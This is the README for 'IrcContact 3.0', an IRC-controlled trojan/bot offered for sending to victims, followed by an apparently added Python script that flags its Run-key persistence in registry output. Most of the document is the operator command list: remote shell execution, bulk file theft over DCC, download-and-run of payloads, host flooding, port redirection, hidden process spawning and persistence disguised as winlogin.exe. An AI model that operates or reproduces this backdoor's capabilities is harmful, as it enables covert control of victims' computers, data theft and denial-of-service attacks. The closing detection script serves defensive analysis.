by Impactus
Written in Visual C++
Released in October 2003
IrcContact 3.0 by Impactus

IrcContact is an IRC client (Trojan/BOT) that covertly connects to a specified IRC server when executed. A simple IRC client like mIRC or pIRCH is enough to have full access to the bot. Just send the user password or the master password to log on to the bot, and it will answer you with the many commands that can be executed on the remote computer.

There are two levels of access: the User level and the Master level.
- The User level can execute all commands except "Set", "User" and "Bot", which cover changing bot settings, modifying the access list, and uninstalling, restarting or shutting down the bot
- The Master level can execute all commands

This zip file comes with 3 files:
1 - IrcContact.exe - The Trojan/BOT to be sent to the victim.
2 - IrcCFG.exe ----- The Configurator Tool, you can configure the trojan (IrcContact.exe) as you want.
3 - ReadMe.txt ----- The file you are reading! Duh!

IrcContact Changelog:

Version (2.0 to 3.0)
- fixed a bug which reset the bot configuration
- parsing function rewritten
- a bunch of new commands added, see the commands marked with an asterisk
- added the possibility to use the '"' characters to easily move or copy files

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

The commands with an asterisk symbol before them are the new commands added from IrcContact 2.0 to 3.0

Bot Commands:

<User password> - log on with user access, the "Set", "User" and "Bot" commands will be denied
<Master password> - log on with master access, all following commands will be activated
cmdlist - Enumerate commands list, NOTE: all the following commands can be executed in DCC chat
cmdlist more - Enumerate more commands list, these commands were not included in "cmdlist" because the bot could be disconnected for flooding
\<command> - This will execute an IRC command on the bot.
    Ex: \join #IrcContact (will make the bot join #IrcContact)
GetInfo - Get information about the remote computer (Windows version, Computer Name, UserName, CPU speed, etc.)
ExitWin <1 to 5> - Exit Windows: 1=Shutdown; 2=Reboot; 3=Logoff; 4=PowerOff; 5=Force ShutDown; *6=Crash
Shell <Command> - Execute a remote shell command (DOS command)

Notify
    Pvts - Notifies you whenever the bot receives a private message
    Wins - Notifies you whenever the remote user changes the active window
    * Chans - Notifies you whenever anyone sends a message to, joins, parts or quits a channel (where the bot is)

Win
    list - List visible windows
    list all - List all windows (visible and invisible)
    Activ <HWND> - Activate window
    Kill <HWND> - Kill window

User -> "User" command requires master level access!
    list - list currently logged users and retrieves the access level
    add <Nick> <Level> - logs a user with a certain access level
    rem <ID> - remove user (log out)

Set -> "Set" command requires master level access!
    nick <new nick> - Change nickname
    name <new name> - Change name
    ident <new ident> - Change ident
    userpass <new userpass> - Change user level password
    masterpass <new masterpass> - Change master level password
    channel1 <new channel1> - Change auto join channel1
    channel2 <new channel2> - Change auto join channel2
    channel3 <new channel3> - Change auto join channel3
    server <new server> - Change server to connect
    serverport <new serverport> - Change server port
    NickIdent <0 or 1> - Enable or disable nick auto-identify
    NickPass <new NickPass> - Change nickserv password (auto-identify should be enabled)
    RejoinOnKick <0 or 1> - Enable or disable bot Re-Join-on-Kick if kicked from a channel

Bot -> "Bot" command requires master level access!
    Restart <Quit msg> - Restart bot
    Sleep <Quit msg> - Shutdown bot.. but doesn't uninstall it!
    Kill <Quit msg> - Completely removes the bot from the infected computer

Dir <directory> - List directory, this command is recommended to be done in DCC Chat mode or the bot may be disconnected for flooding!
Get <file> - Download a file through DCC, * this command now supports mask download files
    Ex: 'get C:\images\*.jpg' -> will download all jpeg images in 'C:\images'
mv <Source file> <Dest file> - Move file, *works using '""'
    Ex: mv "C:\original file.txt" "C:\destination file.txt"
cp <Source file> <Dest file> - Copy file, *works using '""'
del <file> - Delete file
Flood <IP> <Time in seconds> - Flood a remote host during a specified time, sometimes the bot may get a timeout quit because it may not respond to server pings while flooding!
end - stop flood
*randnick - Change to a random nick
*lanlist - List shares on lan
*DNS <IP or Hostname> - Resolve IP or Hostname
*Find <rootpath> <filespec> - search for files
    Ex: 'find C:\program files *.ini' -> will find all ini files in 'C:\program files'
*Viewfile <pathname> - retrieve content of a file (this command works only in DCC chat to prevent the bot from being disconnected for flood)
*mkdir <directory> - Create directory
*rmdir <directory> - Remove directory
*setattr <pathname> <RASHT> - Set attributes of a file
    Ex: setattr C:\ircc.txt ASH -> changes the file attributes to: 'hidden', 'archive' and 'system'
*msg <destination> <text> - send a message to <destination> with the text <text>, destination can be a nick or a channel

*proc
    *list - list the processes running on the machine
    *kill <Process ID> - kill a process
    *spawn <visibility> <pathname> - spawn a process, visibility can be 0 for hidden and 1 for visible
        Ex: proc spawn 1 notepad.exe -> will spawn the notepad.exe process visible

*genclone <number_of_clones> - generate clones
*killclones <quit-message> - Kill the clones generated by 'genclone' command

*port
    redir <localport> <remhost:remport> - redirect a port to a remote host in a determined remote port
    appredir <srcport> <pathname> - redirect a port to an application

*wget <url> <save-filename> - download a file from a URL and save it to <save-filename>
*wgetrun <url> <save-filename> - same as before but runs the file after downloading it
*msgbox <icon> <buttons> <title> <text> - send a message box:
    - the <icon> can be: 0 = NOICON; 1 = Exclamation; 2 = Question; 3 = STOP; 4 = INFORMATION;
    - the <buttons> can be: 0 = OK; 1 = OkCancel; 2 = AbortRetryIgnore; 3 = YesNoCancel; 4 = YesNo; 5 = RetryCancel; 6 = CancelTryContinue;
    - the title and the text must be between ""
    Ex: msgbox 4 3 "Welcome to ircc3" "Do you want to continue?" -> displays a messagebox with an Information icon and the buttons Yes, No and Cancel. The title is "Welcome to ircc3" and the text is "Do you want to continue?". The chosen option will be returned to you
cancel <ID> - Cancels any Get or Find command that is in progress.
Ping - Ping remote machine
IP - Retrieve remote machine's IP Address
IPset <IP> - Sometimes the IP is not detected correctly, if you want to download files and you know the IP use this command to set it!
Log Off - Log Off

Note:
- All of these commands can be executed through a channel
- If you are logged on, the bot will auto accept any DCC Send or DCC chat

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

Uninstalling IrcContact 3.0:

1 - Go to the registry key named HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and delete the value that you specified in the Runtime Pathname from the configuration tool.
2 - Reboot your computer
3 - Delete the file in <System dir>/<RuntimePathname>.exe (Ex: C:\Windows\System\winlogin.exe)

After this, no one will access your computer using IrcContact.

If you have any suggestions for the next versions or any bug to report just drop me a line at [email protected]

I'm not responsible for what you do with this program and what the program causes.
So whatever you do, do it at your own risk!

Take a look at http://underfloat.ma.cx for other interesting stuff..

Greetings (in no particular order): Liquidk, revoluti0n, Ska-P, Mano, _TaRaNtUla_, SimBios

Cheers,
Impactus

Server:
c:\WINDOWS\SYSTEM\pathname.exe
size: 106.381 bytes
startup: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "pathname"
added: c:\WINDOWS\SYSTEM\pathname.dll
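
The uninstall steps and the server/startup summary above describe one persistence layout: a Run value named N that launches <System dir>/N.exe. As an added example (not part of the original README), this Python script scans `reg query` output for that layout; the sample output, the function names and the treatment of both System and System32 as the system directory are assumptions.

```python
import ntpath
import re

# Constructed sample of `reg query HKLM\...\Run` output (not from a real host).
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Updater    REG_SZ    "C:\Program Files\Vendor\update.exe" /background
    winlogin    REG_SZ    C:\Windows\System\winlogin.exe
    Audio Tray    REG_SZ    C:\WINDOWS\system32\sndtray.exe
"""

# reg.exe prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
# Assumption: "<System dir>" is System on Win9x and System32 on NT-family hosts.
SYSTEM_DIRS = {r"\windows\system", r"\windows\system32", r"\winnt\system32"}


def command_to_exe(data):
    """Extract the executable path from a Run value's command line."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:].split('"', 1)[0]
    # Unquoted: cut after the first ".exe" so trailing arguments are dropped.
    m = re.match(r"(.+?\.exe)\b", data, re.IGNORECASE)
    return m.group(1) if m else data


def find_candidates(reg_query_output):
    """Return (value_name, exe_path) pairs matching the README's layout:
    a Run value named N whose command is <System dir>/N.exe."""
    hits = []
    for line in reg_query_output.splitlines():
        m = VALUE_LINE.match(line)
        if not m:
            continue  # key header or blank line
        name, _type, data = m.groups()
        exe = command_to_exe(data)
        folder, base = ntpath.split(exe)
        stem, ext = ntpath.splitext(base)
        in_system = ntpath.splitdrive(folder)[1].lower() in SYSTEM_DIRS
        if in_system and ext.lower() == ".exe" and stem.lower() == name.lower():
            hits.append((name, exe))
    return hits


if __name__ == "__main__":
    for name, exe in find_candidates(SAMPLE):
        print(f"review: Run value {name!r} -> {exe}")
```

Matches are candidates for review, since legitimate software can use the same layout; the companion .dll and the 106.381-byte file size listed in the summary are further things to check on the host.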